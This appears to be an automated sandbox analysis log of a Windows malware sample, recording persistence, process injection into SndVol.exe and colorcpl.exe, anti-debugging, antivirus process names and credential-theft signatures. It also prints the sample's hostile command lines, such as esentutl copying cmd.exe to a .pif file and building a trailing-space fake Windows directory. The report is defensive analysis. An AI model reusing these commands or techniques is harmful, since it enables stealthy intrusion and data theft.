Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Dlaybpxl
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Dlaybpxl
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: 0_2_02D4AB1C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\SndVol.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

              Malware Analysis System Evasion

Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 6_2_0292E54F Sleep,ExitProcess
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 19_2_0294E54F Sleep,ExitProcess
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 6_2_029398C2 OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 19_2_029598C2 OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle
Source: C:\Windows\SysWOW64\SndVol.exe | Window / User API: threadDelayed 516
Source: C:\Windows\SysWOW64\SndVol.exe | Window / User API: threadDelayed 9477
              Source: C:\Windows\SysWOW64\SndVol.exeAPI coverage: 8.9 %
              Source: C:\Users\Public\alpha.pifAPI coverage: 6.3 %
              Source: C:\Users\Public\alpha.pifAPI coverage: 7.9 %
              Source: C:\Users\Public\Libraries\Dlaybpxl.PIFAPI coverage: 9.0 %
              Source: C:\Windows\SysWOW64\SndVol.exeAPI coverage: 4.6 %
Source: C:\Windows\SysWOW64\SndVol.exe TID: 1584 | Thread sleep count: 516 > 30
Source: C:\Windows\SysWOW64\SndVol.exe TID: 1584 | Thread sleep time: 1548000 ms cumulative (516 sleeps of 3000 ms) >= 30000 ms threshold
Source: C:\Windows\SysWOW64\SndVol.exe TID: 1584 | Thread sleep count: 9477 > 30
Source: C:\Windows\SysWOW64\SndVol.exe TID: 1584 | Thread sleep time: 28431000 ms cumulative (9477 sleeps of 3000 ms) >= 30000 ms threshold
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\Public\xpha.pifLast function: Thread delayed
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: 0_2_02D35908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 6_2_0292B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 6_2_0293B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 6_2_0296D5E9 FindFirstFileExA
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 6_2_0292B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 6_2_02927A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 6_2_02926AC2 FindFirstFileW,FindNextFileW
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 6_2_029289A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 6_2_02938C69 FindFirstFileW,FindNextFileW,FindNextFileW
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 6_2_02928DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\Public\alpha.pif | Code function: 9_2_00E40207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove
Source: C:\Users\Public\alpha.pif | Code function: 9_2_00E4589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose
Source: C:\Users\Public\alpha.pif | Code function: 9_2_00E44EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW
Source: C:\Users\Public\alpha.pif | Code function: 9_2_00E53E66 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\Public\alpha.pif | Code function: 9_2_00E3532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose
Source: C:\Users\Public\alpha.pif | Code function: 11_2_00E4589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose
Source: C:\Users\Public\alpha.pif | Code function: 11_2_00E40207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove
Source: C:\Users\Public\alpha.pif | Code function: 11_2_00E44EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW
Source: C:\Users\Public\alpha.pif | Code function: 11_2_00E53E66 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\Public\alpha.pif | Code function: 11_2_00E3532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 19_2_0294B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 19_2_0295B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 19_2_0298D5E9 FindFirstFileExA
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 19_2_0294B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 19_2_02947A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 19_2_02946AC2 FindFirstFileW,FindNextFileW
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 19_2_029489A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 19_2_02958C69 FindFirstFileW,FindNextFileW,FindNextFileW
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 19_2_02948DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 6_2_02926F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW
Source: jW3NEKvxH1.exe, 00000000.00000002.2265349899.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2265349899.00000000007E3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: xpha.pif, 0000000C.00000002.2390568725.0000000002E8B000.00000004.00000020.00020000.00000000.sdmp, Dlaybpxl.PIF, 0000000F.00000002.2410857467.00000000006EF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: SndVol.exe, 00000006.00000002.4603655140.0000000000607000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllRR
Source: Dlaybpxl.PIF, 00000017.00000002.2476572161.00000000007E8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllvv
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | API call chain: ExitProcess graph end node (graph_0-77656)
Source: C:\Windows\SysWOW64\SndVol.exe | API call chain: ExitProcess graph end node (graph_6-47291)
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF | API call chain: ExitProcess graph end node

              Anti Debugging

Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: 0_2_02D4F744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Process queried: DebugPort (ProcessDebugPort via NtQueryInformationProcess, the query CheckRemoteDebuggerPresent performs internally)
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF | Process queried: DebugPort
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF | Process queried: DebugPort
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 6_2_0295A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: 0_2_02D4894C LoadLibraryW,GetProcAddress,FreeLibrary
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: 0_2_02DF9AE4 mov eax, dword ptr fs:[00000030h] (fs:[30h] is the PEB pointer in the TEB; reading it directly is the API-free way to check PEB.BeingDebugged or NtGlobalFlag)
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 6_2_02962554 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\alpha.pif | Code function: 9_2_00E5C1FA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\alpha.pif | Code function: 11_2_00E5C1FA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 19_2_02982554 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 6_2_02930B19 GetNativeSystemInfo,GetProcessHeap,HeapAlloc,SetLastError,SetLastError
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 6_2_02954168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 6_2_0295A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 6_2_02953B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 6_2_02953CD7 SetUnhandledExceptionFilter
Source: C:\Users\Public\alpha.pif | Code function: 9_2_00E46EC0 SetUnhandledExceptionFilter
Source: C:\Users\Public\alpha.pif | Code function: 9_2_00E46B40 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\Public\alpha.pif | Code function: 11_2_00E46EC0 SetUnhandledExceptionFilter
Source: C:\Users\Public\alpha.pif | Code function: 11_2_00E46B40 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\Public\xpha.pif | Code function: 12_2_00843600 SetUnhandledExceptionFilter
Source: C:\Users\Public\xpha.pif | Code function: 12_2_00843470 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 19_2_02974168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 19_2_0297A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 19_2_02973B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 19_2_02973CD7 SetUnhandledExceptionFilter

              HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\Public\Libraries\Dlaybpxl.PIF | Process created / APC Queued / Resumed: C:\Windows\SysWOW64\colorcpl.exe
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Process created / APC Queued / Resumed: C:\Windows\SysWOW64\SndVol.exe
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF | Process created / APC Queued / Resumed: C:\Windows\SysWOW64\SndVol.exe
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Memory allocated: C:\Windows\SysWOW64\SndVol.exe base: 2920000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF | Memory allocated: C:\Windows\SysWOW64\SndVol.exe base: 2940000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF | Memory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 2460000 protect: page execute and read and write
Source: C:\Windows\SysWOW64\esentutl.exe | File created: C:\Users\Public\alpha.pif
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Thread APC queued: target process: C:\Windows\SysWOW64\SndVol.exe
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe6_2_02930F36
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe19_2_02950F36
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 6_2_02938754 mouse_event,6_2_02938754
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \"
Source: C:\Users\Public\alpha.pif | Process created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF | Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF | Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: 0_2_02DEB39A cpuid 0_2_02DEB39A
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02D35ACC
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: GetLocaleInfoA,0_2_02D3A7C4
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: GetLocaleInfoA,0_2_02D3A810
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02D35BD8
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: GetLocaleInfoW,6_2_029712EA
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,6_2_029713B7
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: GetLocaleInfoW,6_2_029710BA
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: EnumSystemLocalesW,6_2_029670AE
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,6_2_029711E3
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: GetLocaleInfoA,6_2_0292E679
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: GetLocaleInfoW,6_2_02967597
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,6_2_02970A7F
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,6_2_02970E6A
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: EnumSystemLocalesW,6_2_02970CF7
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: EnumSystemLocalesW,6_2_02970DDD
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: EnumSystemLocalesW,6_2_02970D42
Source: C:\Users\Public\alpha.pif | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,9_2_00E38572
Source: C:\Users\Public\alpha.pif | Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc,9_2_00E36854
Source: C:\Users\Public\alpha.pif | Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,9_2_00E39310
Source: C:\Users\Public\alpha.pif | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,11_2_00E38572
Source: C:\Users\Public\alpha.pif | Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc,11_2_00E36854
Source: C:\Users\Public\alpha.pif | Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,11_2_00E39310
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF | Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,15_2_02E25ACC
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF | Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,15_2_02E25BD7
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF | Code function: GetLocaleInfoA,15_2_02E2A810
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: GetLocaleInfoW,19_2_029912EA
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,19_2_029913B7
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: GetLocaleInfoW,19_2_029910BA
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: EnumSystemLocalesW,19_2_029870AE
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,19_2_029911E3
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: GetLocaleInfoA,19_2_0294E679
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: GetLocaleInfoW,19_2_02987597
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,19_2_02990A7F
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,19_2_02990E6A
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: EnumSystemLocalesW,19_2_02990CF7
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: EnumSystemLocalesW,19_2_02990DDD
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: EnumSystemLocalesW,19_2_02990D42
Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\alpha.pif | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: 0_2_02D3920C GetLocalTime,0_2_02D3920C
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 6_2_0293A7A2 GetComputerNameExW,GetUserNameW,6_2_0293A7A2
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 6_2_0296800F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,6_2_0296800F
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: 0_2_02D3B78C GetVersionExA,0_2_02D3B78C
Source: C:\Windows\SysWOW64\SndVol.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: cmdagent.exe
Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: quhlpsvc.exe
Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: avgamsvr.exe
Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: TMBMSRV.exe
Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: Vsserv.exe
Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: avgupsvc.exe
Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: avgemc.exe
Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: MsMpEng.exe

              Stealing of Sensitive Information

Source: Yara match | File source: 19.2.SndVol.exe.2940000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 24.2.colorcpl.exe.2460000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 24.2.colorcpl.exe.2460000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.SndVol.exe.2920000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.SndVol.exe.2920000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.SndVol.exe.2940000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.jW3NEKvxH1.exe.2d30000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4603655140.0000000000607000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.2435347353.0000000021D67000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000002.2475144100.0000000002460000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.2410456379.0000000002940000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
